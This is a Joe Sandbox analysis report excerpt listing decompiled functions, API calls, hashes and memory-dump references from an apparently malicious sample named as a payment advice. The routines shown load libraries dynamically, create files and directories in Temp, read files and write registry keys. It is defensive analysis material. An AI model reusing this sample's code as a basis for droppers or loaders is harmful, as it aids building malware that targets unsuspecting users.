Instruction Fuzzy Hash: 80012831724210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E2B Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E49
EnableWindow.USER32(00000000,00000000), ref: 00401E54

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: a78955f023db9ad27f9cc58996d463eeceafedf9ab62e58194b14ffab6a0fa63
Instruction ID: 03bd5150381a8100516e4bd6b800a38f5b51aa9a4917fb4b876f9ca09f65a04e
Opcode Fuzzy Hash: a78955f023db9ad27f9cc58996d463eeceafedf9ab62e58194b14ffab6a0fa63
Instruction Fuzzy Hash: 7FE092B2F08202AFDB14EBE5E9485EEB7B0DF40319B10403BE001F11D0DA7849419F59

Uniqueness

Uniqueness Score: -1.00%

Function 00406302 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406302(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409240);
				_t5 = GetModuleHandleA( *(_t10 + 0x409240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x409244));
				}
				_t5 = E00406294(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040630a
0x0040630d
0x00406314
0x0040631c
0x00406328
0x00000000
0x0040632f
0x0040631f
0x00406326
0x00000000
0x00406337
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
GetProcAddress.KERNEL32(00000000,?), ref: 0040632F

Part of subcall function 00406294: GetSystemDirectoryA.KERNEL32 ref: 004062AB
Part of subcall function 00406294: wsprintfA.USER32 ref: 004062E4
Part of subcall function 00406294: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F8

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 0d35e83e7827ddfc44332ff894d31571b8ba04ccc8674abf719cedda659f01fc
Instruction ID: 7792f7d89acf823de2699a2c6bb45250695d03a410eb934ddee53f05324a8379
Opcode Fuzzy Hash: 0d35e83e7827ddfc44332ff894d31571b8ba04ccc8674abf719cedda659f01fc
Instruction Fuzzy Hash: D2E08C32A08221ABD3106B74AD0493B73E8DB99740702487EFA06F2180D738EC2296A9

Uniqueness

Uniqueness Score: -1.00%

Function 00405B03 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405B03(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405b07
0x00405b14
0x00405b29
0x00405b2f

APIs

GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,80000000,00000003), ref: 00405B07
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADE Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405ADE(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405ae3
0x00405ae9
0x00405aee
0x00405af7
0x00405af7
0x00405b00

APIs

GetFileAttributesA.KERNELBASE(?,?,004056F6,?,?,00000000,004058D9,?,?,?,?), ref: 00405AE3
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405AF7

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
Instruction ID: b7bec259a7406421912cbc46aebe03861170fd98e68390908d479edd226f6e0d
Opcode Fuzzy Hash: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
Instruction Fuzzy Hash: E5D01272908121BFC2112728ED0C89BBF95DB543B1702CB31FD79A26F0E7304C52AAA5

Uniqueness

Uniqueness Score: -1.00%

Function 004055D4 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055D4(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004055da
0x004055e2
0x00000000
0x004055e8
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031C9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 004055DA
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E8

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction ID: 176dbb695fa69d1773a7d690fb999828ada584b34c1629d79551d48c85d86b1a
Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction Fuzzy Hash: E1C08C30608101BBD6000B318D09B073A56AB00340F1084356002E00F4C6309100C93F

Uniqueness

Uniqueness Score: -1.00%

Function 004025CA Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025CA(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _t27;
				intOrPtr _t33;
				void* _t38;
				void* _t41;

				_t33 = __edx;
				 *((intOrPtr*)(_t38 - 8)) = __ebx;
				_t27 = E00402AA9(2);
				_t41 = _t27 - 1;
				 *((intOrPtr*)(_t38 - 0x3c)) = _t33;
				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
				if(_t41 < 0) {
					L24:
					 *0x4237a8 =  *0x4237a8 +  *(_t38 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L21:
						__esi =  *((intOrPtr*)(__ebp - 8));
						goto L22;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 0x30) = E00405EE1(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
							goto L21;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 8));
							while(1) {
								__eax = __ebp - 0xd;
								__eax = E00405B7B( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
								if(__eax == 0) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
									 *(__ebp - 0xd) & 0x000000ff = E00405EC8(__edi,  *(__ebp - 0xd) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 0xd);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 0xd);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L25;
							}
							L22:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t41 == 0) {
								 *(_t38 - 4) = 1;
							}
							goto L24;
						}
					}
				}
				L25:
				return 0;
			}

0x004025ca
0x004025cc
0x004025cf
0x004025d4
0x004025d8
0x004025db
0x004025de
0x00402957
0x0040295a
0x004025e4
0x004025e4
0x004025eb
0x004025ed
0x004025ed
0x004025f2
0x0040267a
0x0040267a
0x00000000
0x004025f8
0x004025f9
0x00402604
0x00402607
0x00000000
0x00402609
0x00402609
0x0040260c
0x0040260c
0x00402615
0x0040261c
0x00000000
0x00000000
0x00402621
0x0040264a
0x00402623
0x00402627
0x00402654
0x0040265a
0x00402672
0x00402664
0x00402664
0x00402667
0x00402667
0x00000000
0x0040262f
0x0040262f
0x00402632
0x00402635
0x00402638
0x0040263b
0x00000000
0x0040263d
0x00402640
0x00000000
0x00402642
0x00000000
0x00402642
0x00402640
0x0040263b
0x00402627
0x00000000
0x00402621
0x0040267d
0x0040267d
0x004015b0
0x0040271c
0x0040271c
0x00000000
0x004015b0
0x00402607
0x004025f2
0x00402960
0x00402966

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: b03cd8df04d8ee592481774790235ccd8d35e351eaff095f09b5a78437986bf9
Instruction ID: b7990f85511c1a8277131c480cae9c0630c220dcde9d87561c1bd8ec097ebd3d
Opcode Fuzzy Hash: b03cd8df04d8ee592481774790235ccd8d35e351eaff095f09b5a78437986bf9
Instruction Fuzzy Hash: 6F21F970D04299BADF318FA99548BAEBF709F11304F1449BFE490B62D1C2BD8A81CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040166A() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402ACB(0xffffffd0);
				_t16 = E00402ACB(0xffffffdf);
				E00402ACB(0x13);
				_t7 = MoveFileA(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E0040626D(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00405D49(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}

0x00401673
0x0040167c
0x0040167e
0x00401685
0x0040168d
0x00401699
0x0040271c
0x004016ad
0x004016af
0x004016b4
0x00000000
0x004016b4
0x0040168f
0x0040168f
0x0040223d
0x0040223d
0x0040223d
0x0040295a
0x00402966

APIs

MoveFileA.KERNEL32 ref: 00401685

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 26d88946d746ebc1670f9161201231e6ae9f97e72a3a78d01d85b65aeff7b960
Instruction ID: ee0d2e8c4a6bc67ad3f2010de207a76cda8ddad3dc87d29ee1faed781c7fdfb3
Opcode Fuzzy Hash: 26d88946d746ebc1670f9161201231e6ae9f97e72a3a78d01d85b65aeff7b960
Instruction Fuzzy Hash: DAF09031708121A3CB20BBA64F5DD9F55A48F8232CB244A3FB011B21D1DABD850286BF

Uniqueness

Uniqueness Score: -1.00%

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00402688(intOrPtr __edx, void* __eflags) {
				long _t7;
				long _t9;
				LONG* _t11;
				void* _t13;
				intOrPtr _t14;
				void* _t17;
				void* _t19;

				_t14 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t7 = E00402AA9(2);
					_pop(_t13);
					 *((intOrPtr*)(_t19 - 0x3c)) = _t14;
					_t9 = SetFilePointer(E00405EE1(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
						_push(_t9);
						E00405EC8();
					}
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402688
0x00402688
0x00402689
0x00402691
0x00402696
0x00402697
0x004026a6
0x004026af
0x004028fd
0x004028ff
0x004028ff
0x004026af
0x0040295a
0x00402966

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A6

Part of subcall function 00405EC8: wsprintfA.USER32 ref: 00405ED5

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 1866a79a0dd33f9b76b4b4870d1e8df3ea0d2d3e28c39f71af17ea42b0a339ae
Instruction ID: ad0f1944beabc9f4f94a2b839352b0f3367618053d3f66ec8c7920e99add9472
Opcode Fuzzy Hash: 1866a79a0dd33f9b76b4b4870d1e8df3ea0d2d3e28c39f71af17ea42b0a339ae
Instruction Fuzzy Hash: FEE0E5B2B04116BBDB01EBD5AA49DBFAB68DB40315B10403BF141B10D1C67D4A429B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004022FC Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004022FC(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E00402ACB(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E00402ACB(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
					_t11 = E00402ACB(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402ACB(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}

0x004022fc
0x004022fc
0x004022fe
0x00402302
0x00402305
0x0040230d
0x00402311
0x0040231a
0x0040231a
0x0040231f
0x00402328
0x00402328
0x00402335
0x004015ae
0x004015b0
0x0040271c
0x0040271c
0x0040295a
0x00402966

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: bea2f7f45a5b95f20422f553bb54cf0bca74b5c46afa68ceb6f5672cec46389e
Instruction ID: 8372e14bab9712360bd12688710ae7862641a3d34eb209c6c5aff3955a2008c3
Opcode Fuzzy Hash: bea2f7f45a5b95f20422f553bb54cf0bca74b5c46afa68ceb6f5672cec46389e
Instruction Fuzzy Hash: F1E01231B405146BD7207AB10ECE96F10989BC4308B284D3AF502762C6DDBD4D4245B9

Uniqueness

Uniqueness Score: -1.00%

Function 00405E1E Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E1E(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405D75(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00405e28
0x00405e31
0x00405e47
0x00000000
0x00405e47
0x00405e35
0x00000000

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
Instruction ID: 614deb5803ecfea412708c7c06f6093feae3e2eaa5d1670ea64157aa9e0e4aa4
Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
Instruction Fuzzy Hash: 1AE0ECB201454DBFEF095F90ED0ADBB371DEB14310F00492EFA16E40A0F6B5A920AA75

Uniqueness

Uniqueness Score: -1.00%

Function 00405B7B Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B7B(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405b7f
0x00405b8f
0x00405b97
0x00000000
0x00405b9e
0x00000000
0x00405ba0

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040318B,00000000,00000000,00402FE8,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8F

Memory Dump Source

